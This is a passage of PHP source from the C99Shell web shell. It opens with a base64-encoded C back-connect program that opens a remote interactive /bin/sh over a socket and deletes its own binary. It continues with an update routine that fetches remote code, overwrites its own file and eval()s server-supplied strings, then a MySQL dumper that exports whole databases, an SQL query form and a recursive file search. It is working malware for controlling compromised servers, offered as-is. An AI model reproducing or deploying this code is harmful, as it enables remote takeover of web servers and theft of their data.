"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l".
"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk".
"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk".
"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g".
"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh".
"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy".
"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg".
"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1".
"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0".
"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo".
"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi".
"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==");}
 else {return false;}
}
}
if (!function_exists("c99sh_getupdate"))
{
function c99sh_getupdate($update = true)
{
 $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&";
 $data = @file_get_contents($url);
 if (!$data) {return "Can't connect to update-server!";}
 else
 {
  $data = ltrim($data);
  $string = substr($data,3,ord($data{2}));
  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;}
  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
  if ($data{0} == "\x99" and $data{1} == "\x03")
  {
   $string = explode("\x01",$string);
   if ($update)
   {
    $confvars = array();
    $sourceurl = $string[0];
    $source = file_get_contents($sourceurl);
    if (!$source) {return "Can't fetch update!";}
    else
    {
     $fp = fopen(__FILE__,"w");
     if (!$fp) {return "Local error: can't write update to __FILE__! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";}
    }
   }
   else {return "New version are available: ".$string[1];}
  }
  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;}
  else {return "Error in protocol: segmentation failed! (".$data.") ";}
 }
}
}
if (!function_exists("mysql_dump"))
{
function mysql_dump($set)
{
 global $shver;
 $sock = $set["sock"];
 $db = $set["db"];
 $print = $set["print"];
 $nl2br = $set["nl2br"];
 $file = $set["file"];
 $add_drop = $set["add_drop"];
 $tabs = $set["tabs"];
 $onlytabs = $set["onlytabs"];
 $ret = array();
 $ret["err"] = array();
 if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
 if (empty($db)) {$db = "db";}
 if (empty($print)) {$print = 0;}
 if (empty($nl2br)) {$nl2br = 0;}
 if (empty($add_drop)) {$add_drop = true;}
 if (empty($file))
 {
  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
 }
 if (!is_array($tabs)) {$tabs = array();}
 if (empty($add_drop)) {$add_drop = true;}
 if (sizeof($tabs) == 0)
 {
  // retrive tables-list
  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
 }
 $out = "# Dumped by C99Shell.SQL v. ".$shver."
# Home page: http://ccteam.ru
#
# Host settings:
# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
# Date: ".date("d.m.Y H:i:s")."
# DB: \"".$db."\"
#---------------------------------------------------------
";
 $c = count($onlytabs);
 foreach($tabs as $tab)
 {
  if ((in_array($tab,$onlytabs)) or (!$c))
  {
   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
   // recieve query for create table structure
   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
   if (!$res) {$ret["err"][] = mysql_smarterror();}
   else
   {
    $row = mysql_fetch_row($res);
    $out .= $row["1"].";\n\n";
    // recieve table variables
    $res = mysql_query("SELECT * FROM `$tab`", $sock);
    if (mysql_num_rows($res) > 0)
    {
     while ($row = mysql_fetch_assoc($res))
     {
      $keys = implode("`, `", array_keys($row));
      $values = array_values($row);
      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
      $values = implode("', '", $values);
      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
      $out .= $sql;
     }
    }
   }
  }
 }
 $out .= "#---------------------------------------------------------------------------------\n\n";
 if ($file)
 {
  $fp = fopen($file, "w");
  if (!$fp) {$ret["err"][] = 2;}
  else
  {
   fwrite ($fp, $out);
   fclose ($fp);
  }
 }
 if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
 return $out;
}
}
if (!function_exists("mysql_buildwhere"))
{
function mysql_buildwhere($array,$sep=" and",$functs=array())
{
 if (!is_array($array)) {$array = array();}
 $result = "";
 foreach($array as $k=>$v)
 {
  $value = "";
  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
  $value .= "'".addslashes($v)."'";
  if (!empty($functs[$k])) {$value .= ")";}
  $result .= "`".$k."` = ".$value.$sep;
 }
 $result = substr($result,0,strlen($result)-strlen($sep));
 return $result;
}
}
if (!function_exists("mysql_fetch_all"))
{
function mysql_fetch_all($query,$sock)
{
 if ($sock) {$result = mysql_query($query,$sock);}
 else {$result = mysql_query($query);}
 $array = array();
 while ($row = mysql_fetch_array($result)) {$array[] = $row;}
 mysql_free_result($result);
 return $array;
}
}
if (!function_exists("mysql_smarterror"))
{
function mysql_smarterror($type,$sock)
{
 if ($sock) {$error = mysql_error($sock);}
 else {$error = mysql_error();}
 $error = htmlspecialchars($error);
 return $error;
}
}
if (!function_exists("mysql_query_form"))
{
function mysql_query_form()
{
 global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
 if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
 if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
 if ((!$submit) or ($sql_act))
 {
  echo "<table border=0><tr><td><form action=\"".$sql_surl."\" name=\"c99sh_sqlquery\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=\"sql_act\" value=\"query\"><input type=hidden name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
  if ($tbl_struct)
  {
   echo "<td valign=\"top\"><b>Fields:</b><br>";
   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
   echo "</td></tr></table>";
  }
 }
 if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
}
}
if (!function_exists("mysql_create_db"))
{
function mysql_create_db($db,$sock="")
{
 $sql = "CREATE DATABASE `".addslashes($db)."`;";
 if ($sock) {return mysql_query($sql,$sock);}
 else {return mysql_query($sql);}
}
}
if (!function_exists("mysql_query_parse"))
{
function mysql_query_parse($query)
{
 $query = trim($query);
 $arr = explode (" ",$query);
 /*array array()
 {
  "METHOD"=>array(output_type),
  "METHOD1"...
  ...
 }
 if output_type == 0, no output,
 if output_type == 1, no output if no error
 if output_type == 2, output without control-buttons
 if output_type == 3, output with control-buttons
 */
 $types = array(
  "SELECT"=>array(3,1),
  "SHOW"=>array(2,1),
  "DELETE"=>array(1),
  "DROP"=>array(1)
 );
 $result = array();
 $op = strtoupper($arr[0]);
 if (is_array($types[$op]))
 {
  $result["propertions"] = $types[$op];
  $result["query"]  = $query;
  if ($types[$op] == 2)
  {
   foreach($arr as $k=>$v)
   {
    if (strtoupper($v) == "LIMIT")
    {
     $result["limit"] = $arr[$k+1];
     $result["limit"] = explode(",",$result["limit"]);
     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
     unset($arr[$k],$arr[$k+1]);
    }
   }
  }
 }
 else {return false;}
}
}
if (!function_exists("c99fsearch"))
{
function c99fsearch($d)
{
 global $found;
 global $found_d;
 global $found_f;
 global $search_i_f;
 global $search_i_d;
 global $a;
 if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
 $h = opendir($d);
 while (($f = readdir($h)) !== false)
 {
  if($f != "." && $f != "..")
  {
   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f));
   if (is_dir($d.$f))
   {